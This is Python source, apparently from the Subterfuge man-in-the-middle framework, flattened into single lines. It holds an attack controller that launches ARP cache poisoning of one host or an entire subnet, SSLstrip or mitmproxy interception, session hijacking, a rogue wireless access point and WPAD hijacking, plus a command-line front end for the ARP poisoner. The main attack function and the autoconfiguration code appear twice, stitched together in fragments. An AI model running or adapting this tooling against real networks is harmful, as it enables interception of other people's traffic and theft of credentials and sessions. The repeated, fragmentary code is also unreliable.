def main(): #Checks for sane arguments if len(sys.argv) < 2: print "Invalid Arguments" os.system("python /usr/share/subterfuge/utilities/notification.py 'ARP-MITM Error' 'Invalid Arguments were entered.'") exit() #Help menu elif sys.argv[1] == "-h" or sys.argv[1] == "--help": print "\nARPMITM courtesy of r00t0v3rr1d3 \n" print "Usage: python arpmitm.py [OPTIONS] gateway\n" print "HELP MENU:" print " -s,--single [target ip] only poision a single host" print " -r,--rearp Properly rearp network" print " -h,--help display this message" elif sys.argv[1] == "-r" or sys.argv[1] == "--rearp": print 'Re-arping the network, removing man-in-the-middle...\n' os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Re-arping the network, removing man-in-the-middle.'") rearp(sys.argv[2]) elif sys.argv[1] == "-s" or sys.argv[1] == "--single": print 'Poisoning a single host: ' + sys.argv[2] + '...\n' try: os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Poisoning a single host.'") poisonsingle(sys.argv[2], sys.argv[3]) except: notification_attackctrl("no-single-target") print "Could not poison single target: no target found!" elif len(sys.argv) < 3: print "Poisoning the entire subnet...\n" os.system("python /usr/share/subterfuge/utilities/notification.py 'Status' 'Poisoning the entire subnet.'") poisonall(sys.argv[1])
def attack(method): notification_attackctrl("init") print "Starting Pwn Ops..." #Determine Active Vectors acp, apgenatk, wpad = getvectors() target = "" #Launch Attacks #ARP Cache Poison if acp == "yes": #Auto Pwn Method if (method == "auto"): print "Running AutoPwn Method..." #AutoConfig autoconfig() interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo( ) #Begin Attack Setup print "Automatically Configuring Subterfuge..." iptablesconfig(proxymode) print "Initiating ARP Poison With ARPMITM..." #Get Poison Options for info in arppoison.objects.all(): target = info.target method = info.method #Check for poison single/all if (method == "single"): try: print "Poisoning: " + target command = 'python ' + os.path.dirname( os.path.abspath(__file__) ) + '/utilities/arpmitm.py -s ' + target + " " + gateway + ' &' except: notification_attackctrl("no-single-target") print "Could not poison single target: no target found!" else: print "Poisoning: Network" command = 'python ' + os.path.dirname(os.path.abspath( __file__)) + '/utilities/arpmitm.py ' + gateway + ' &' #ARP Cache Poison through Subterfuge: os.system(command) if proxymode == "sslstrip": print "Starting up SSLstrip..." sslstrip() elif proxymode == "mitmproxy": print "Starting up the MITM Attack Proxy..." mitmproxy() sessionhijack() #Get & Log Router Mac if (os.path.exists( os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt")): f = open( os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt", 'r') mac = f.readline() macaddr = mac.rstrip("\n") setup.objects.update(routermac=macaddr) #os.system("python " + str(os.path.dirname(__file__)) + "/mitm.py -a &") #Check for ARPWatch if (smartarp == "yes"): try: os.system("python " + str(os.path.dirname(__file__)) + "/utilities/arpwatch.py " + gateway + " " + routermac + " " + attackerip + " &") except: notification_attackctrl("arpwatch-no-rmac") print "Encountered an error configuring arpwatch: Router MAC Address Unknown." #Standard Attack Method else: interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo( ) #Begin Attack Setup print "Automatically Configuring Subterfuge..." iptablesconfig(proxymode) print "Initiating ARP Poison With ARPMITM..." #Get Poison Options for info in arppoison.objects.all(): target = info.target #Check for poison single/all if (method == "single"): command = 'python ' + os.path.dirname( os.path.abspath(__file__) ) + '/utilities/arpmitm.py -s ' + target + " " + gateway + ' &' else: command = 'python ' + os.path.dirname(os.path.abspath( __file__)) + '/utilities/arpmitm.py ' + gateway + ' &' #ARP Cache Poison through Subterfuge: os.system(command) iptablesconfig(proxymode) if proxymode == "sslstrip": print "Starting up SSLstrip..." sslstrip() elif proxymode == "mitmproxy": print "Starting up the MITM Attack Proxy..." mitmproxy() sessionhijack() #Get & Log Router Mac if (os.path.exists( os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt")): f = open( os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt", 'r') mac = f.readline() macaddr = mac.rstrip("\n") setup.objects.update(routermac=macaddr) #Check for ARPWatch if (smartarp == "yes"): os.system("python " + str(os.path.dirname(__file__)) + "/utilities/arpwatch.py " + gateway + " " + routermac + " " + attackerip + " &") else: print "Dynamic ARP Retention is disabled." #Wireless AP Generator if apgenatk == "yes": #Get Attack Info for info in apgen.objects.all(): essid = info.essid channel = info.channel atknic = info.atknic netnic = info.netnic print "Launching Access Point Generation Attack..." cmd = "xterm -e sh -c 'python " + str( os.path.dirname(__file__) ) + "/utilities/apgen.py " + essid + " " + atknic + " " + netnic + "' &" print cmd os.system(cmd) #Begin MITM Attack Setup print "Automatically Configuring Subterfuge..." iptablesconfig(proxymode) print "Starting up SSLstrip..." if proxymode == "sslstrip": sslstrip() elif proxymode == "mitmproxy": print "Starting up the MITM Attack Proxy..." mitmproxy() sessionhijack() #WPAD Hijacking if wpad == "yes": #Auto Pwn Method print "Running AutoPwn Method..." #AutoConfig autoconfig() interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo( ) #Begin MITM Attack Setup #Begin Attack Setup #No IPTables SSLStrip Configuration necessary for WPAD Hijacking #print "Automatically Configuring Subterfuge..." #iptablesconfig(proxymode) #Flush IPTables print "Flushing IPTables for WPAD Hijacking" os.system("iptables -t nat -F") print "Starting up SSLstrip..." sslstrip() sessionhijack() #Execute WPAD Hijacking os.system("python " + str(os.path.dirname(__file__)) + "/utilities/wpadhijack.py " + gateway + " " + routermac + " " + attackerip + " &") #Start Up Modules modules()
temp = f.readline().rstrip('\n') ipaddress = re.findall(r'\d*.\d*.\d*.\d*', temp)[0] # Edit subterfuge.conf Deprecate for Version 5.0 print "Using: ", result[0] print "Setting gateway as: ", autogate conf[17] = autogate + "\n" conf[15] = result[0] + "\n" conf[26] = ipaddress + "\n" #Set Database setup.objects.update(gateway=autogate) setup.objects.update(iface=result[0]) setup.objects.update(ip=ipaddress) # Write to subterfuge.conf Deprecate for Version 5.0 with open(str(os.path.dirname(__file__)) + '/subterfuge.conf', 'w') as file: file.writelines(conf) #Check Arguments if len(sys.argv) < 1: notification_attackctrl("autoconfig-error") print "Encountered an error configuring attack: Invalid Arguments. Terminating..." exit() else: attack(sys.argv[1])
def attack(method): notification_attackctrl("init") print "Starting Pwn Ops..." #Determine Active Vectors acp, apgenatk, wpad = getvectors() target = "" #Launch Attacks #ARP Cache Poison if acp == "yes": #Auto Pwn Method if (method == "auto"): print "Running AutoPwn Method..." #AutoConfig autoconfig() interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo() #Begin Attack Setup print "Automatically Configuring Subterfuge..." iptablesconfig(proxymode) print "Initiating ARP Poison With ARPMITM..." #Get Poison Options for info in arppoison.objects.all(): target = info.target method = info.method #Check for poison single/all if (method == "single"): try: print "Poisoning: " + target command = 'python ' + os.path.dirname(os.path.abspath(__file__)) + '/utilities/arpmitm.py -s ' + target + " " + gateway + ' &' except: notification_attackctrl("no-single-target") print "Could not poison single target: no target found!" else: print "Poisoning: Network" command = 'python ' + os.path.dirname(os.path.abspath(__file__)) + '/utilities/arpmitm.py ' + gateway + ' &' #ARP Cache Poison through Subterfuge: os.system(command) if proxymode == "sslstrip": print "Starting up SSLstrip..." sslstrip() elif proxymode == "mitmproxy": print "Starting up the MITM Attack Proxy..." mitmproxy() sessionhijack() #Get & Log Router Mac if (os.path.exists(os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt")): f = open(os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt", 'r') mac = f.readline() macaddr = mac.rstrip("\n") setup.objects.update(routermac = macaddr) #os.system("python " + str(os.path.dirname(__file__)) + "/mitm.py -a &") #Check for ARPWatch if (smartarp == "yes"): try: os.system("python " + str(os.path.dirname(__file__)) + "/utilities/arpwatch.py " + gateway + " " + routermac + " " + attackerip + " &") except: notification_attackctrl("arpwatch-no-rmac") print "Encountered an error configuring arpwatch: Router MAC Address Unknown." #Standard Attack Method else: interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo() #Begin Attack Setup print "Automatically Configuring Subterfuge..." iptablesconfig(proxymode) print "Initiating ARP Poison With ARPMITM..." #Get Poison Options for info in arppoison.objects.all(): target = info.target #Check for poison single/all if (method == "single"): command = 'python ' + os.path.dirname(os.path.abspath(__file__)) + '/utilities/arpmitm.py -s ' + target + " " + gateway + ' &' else: command = 'python ' + os.path.dirname(os.path.abspath(__file__)) + '/utilities/arpmitm.py ' + gateway + ' &' #ARP Cache Poison through Subterfuge: os.system(command) iptablesconfig(proxymode) if proxymode == "sslstrip": print "Starting up SSLstrip..." sslstrip() elif proxymode == "mitmproxy": print "Starting up the MITM Attack Proxy..." mitmproxy() sessionhijack() #Get & Log Router Mac if (os.path.exists(os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt")): f = open(os.path.dirname(os.path.abspath(__file__)) + "/arpmitm.txt", 'r') mac = f.readline() macaddr = mac.rstrip("\n") setup.objects.update(routermac = macaddr) #Check for ARPWatch if (smartarp == "yes"): os.system("python " + str(os.path.dirname(__file__)) + "/utilities/arpwatch.py " + gateway + " " + routermac + " " + attackerip + " &") else: print "Dynamic ARP Retention is disabled." #Wireless AP Generator if apgenatk == "yes": #Get Attack Info for info in apgen.objects.all(): essid = info.essid channel = info.channel atknic = info.atknic netnic = info.netnic print "Launching Access Point Generation Attack..." cmd = "xterm -e sh -c 'python " + str(os.path.dirname(__file__)) + "/utilities/apgen.py " + essid + " " + atknic + " " + netnic + "' &" print cmd os.system(cmd) #Begin MITM Attack Setup print "Automatically Configuring Subterfuge..." iptablesconfig(proxymode) print "Starting up SSLstrip..." if proxymode == "sslstrip": sslstrip() elif proxymode == "mitmproxy": print "Starting up the MITM Attack Proxy..." mitmproxy() sessionhijack() #WPAD Hijacking if wpad == "yes": #Auto Pwn Method print "Running AutoPwn Method..." #AutoConfig autoconfig() interface, gateway, attackerip, routermac, smartarp, proxymode = getinfo() #Begin MITM Attack Setup #Begin Attack Setup #No IPTables SSLStrip Configuration necessary for WPAD Hijacking #print "Automatically Configuring Subterfuge..." #iptablesconfig(proxymode) #Flush IPTables print "Flushing IPTables for WPAD Hijacking" os.system("iptables -t nat -F") print "Starting up SSLstrip..." sslstrip() sessionhijack() #Execute WPAD Hijacking os.system("python " + str(os.path.dirname(__file__)) + "/utilities/wpadhijack.py " + gateway + " " + routermac + " " + attackerip + " &") #Start Up Modules modules()
f = os.popen("ifconfig " + result[0] + " | grep \"inet addr\" | sed -e \'s/.*addr://;s/ .*//\'") temp2 = '' temp3 = '' temp = f.readline().rstrip('\n') ipaddress = re.findall(r'\d*.\d*.\d*.\d*', temp)[0] # Edit subterfuge.conf Deprecate for Version 5.0 print "Using: ", result[0] print "Setting gateway as: ", autogate conf[17] = autogate + "\n" conf[15] = result[0] + "\n" conf[26] = ipaddress + "\n" #Set Database setup.objects.update(gateway = autogate) setup.objects.update(iface = result[0]) setup.objects.update(ip = ipaddress) # Write to subterfuge.conf Deprecate for Version 5.0 with open(str(os.path.dirname(__file__)) + '/subterfuge.conf', 'w') as file: file.writelines(conf) #Check Arguments if len(sys.argv) < 1: notification_attackctrl("autoconfig-error") print "Encountered an error configuring attack: Invalid Arguments. Terminating..." exit() else: attack(sys.argv[1])